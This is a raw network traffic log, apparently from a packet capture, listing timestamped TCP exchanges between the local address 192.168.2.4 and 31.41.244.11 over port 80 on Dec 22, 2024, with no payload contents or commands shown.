Dec 22, 2024 02:16:44.630460978 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.632417917 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.632483959 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.632504940 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.632546902 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.634464979 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.634510040 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.634567976 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.634610891 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.636671066 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.636722088 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.636775017 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.636815071 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.638734102 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.638789892 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.638839006 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.638881922 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.640892982 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.640935898 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.640957117 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.640995979 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.642906904 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.642975092 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.643038988 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.643076897 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.644961119 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.644998074 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.645087957 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.645128012 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.646979094 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.647034883 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.647079945 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.647130013 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.648969889 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.649017096 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.649055958 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.649096012 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.650963068 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.651009083 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.651055098 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.651101112 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.652944088 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.653008938 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.653053999 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.653089046 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.654856920 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.654903889 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.654953003 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.654999971 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.656811953 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.656855106 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.656893015 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.656939983 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.658704996 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.658746958 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.658792019 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.658838034 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.660825968 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.660868883 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.660959959 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.661010027 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.662565947 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.662604094 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.662616014 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.662647009 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.664480925 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.664520025 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.664541006 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.664557934 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.666384935 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.666430950 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.666480064 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.666527987 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.668265104 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.668314934 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.668380022 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.668427944 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.670186996 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.670243979 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.670303106 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.670346975 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.672117949 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.672172070 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.672260046 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.672305107 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.674021959 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.674074888 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.674134970 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.674325943 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.675925016 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.675986052 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.676033974 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.676081896 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.677820921 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.677871943 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.677936077 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.677985907 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.679733038 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.679780960 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.679850101 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.679896116 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.681638956 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.681689024 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.681741953 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.681787968 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.683542013 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.683605909 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.683727980 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.683794975 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.685468912 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.685547113 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.685640097 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.685698986 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.687370062 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.687427044 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.687494040 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.687552929 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.689287901 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.689347029 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.689412117 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.689466953 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.691250086 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.691293001 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.691370964 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.691414118 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.693370104 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.693427086 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.693427086 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.693470955 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.695039988 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.695086002 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.695123911 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.695173025 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.696950912 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.696994066 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.697036982 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.697082996 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.698829889 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.698873997 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.698942900 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.698983908 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.700742960 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.700789928 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.700872898 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.700917006 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.702672005 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.702714920 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.702795029 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.702838898 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.704565048 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.704613924 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.704679966 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.704720974 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.706455946 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.706502914 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.706568003 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.706617117 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.708379030 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.708431005 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.708489895 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.708527088 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.710279942 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.710334063 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.710398912 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.710441113 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.712203979 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.712253094 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.712320089 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.712372065 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.714124918 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.714173079 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.714226961 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.714268923 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.716015100 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.716059923 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.716125965 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.716170073 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.717987061 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.718036890 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.718076944 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.718123913 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.719795942 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.719836950 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.809346914 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.809403896 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.809426069 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.809447050 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.810254097 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.810300112 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.810307980 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.810358047 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.811034918 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.811086893 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.811132908 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.811187029 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.812489033 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.812572956 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.812603951 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.812680006 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.813916922 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.813965082 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.814026117 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.814097881 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.815340996 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.815391064 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.815448999 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.815525055 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.816754103 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.816836119 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.816899061 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.816956997 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.818155050 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.818203926 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.818285942 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.818361998 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.819557905 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.819669962 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.819673061 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.819721937 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.820904016 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.820975065 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.821024895 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.821096897 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.822304964 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.822351933 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.822423935 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.822477102 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.823654890 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.823712111 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.823780060 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.823832989 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.824995995 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.825041056 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.825115919 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.825176001 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.826296091 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.826344967 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.826411009 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.826448917 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.827630043 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.827689886 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.827723026 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.827801943 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.828969955 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.829014063 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.829086065 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.829133034 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.830260992 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.830317020 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.830317974 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.830367088 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.831526041 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.831593990 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.831744909 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.831801891 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.832865953 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.832914114 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.832962036 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.833029985 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.834129095 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.834194899 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.834232092 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.834270954 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.835308075 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.835371971 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.835417986 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.835474014 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.836586952 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.836635113 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.836694956 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.836750031 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.837810040 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.837872028 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.837918997 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.837966919 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.839060068 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.839111090 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.839165926 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.839229107 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.840287924 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.840337038 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.840389967 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.840483904 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.841521978 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.841587067 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.841651917 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.841702938 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.842732906 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.842792988 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.842839003 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.842906952 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.843976021 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.844032049 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.844078064 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.844130039 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.845170975 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.845201969 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.845287085 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.845330000 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.846402884 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.846476078 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.846553087 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.846606016 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.847626925 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.847680092 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.847726107 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.847768068 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.848867893 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.849005938 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.849029064 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.849070072 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.850070000 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.850111008 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.850157022 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.850224018 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.851273060 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.851330996 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.851372004 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.851413012 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.852550030 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.852588892 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.852642059 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.852686882 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.853758097 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.853816986 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.853828907 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.853957891 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.854989052 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.855027914 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.855122089 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.855165958 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.856240034 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.856282949 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.856439114 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.856492996 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.857414007 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.857454062 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.857510090 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.857603073 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.858638048 CET	80	49851	31.41.244.11	192.168.2.4
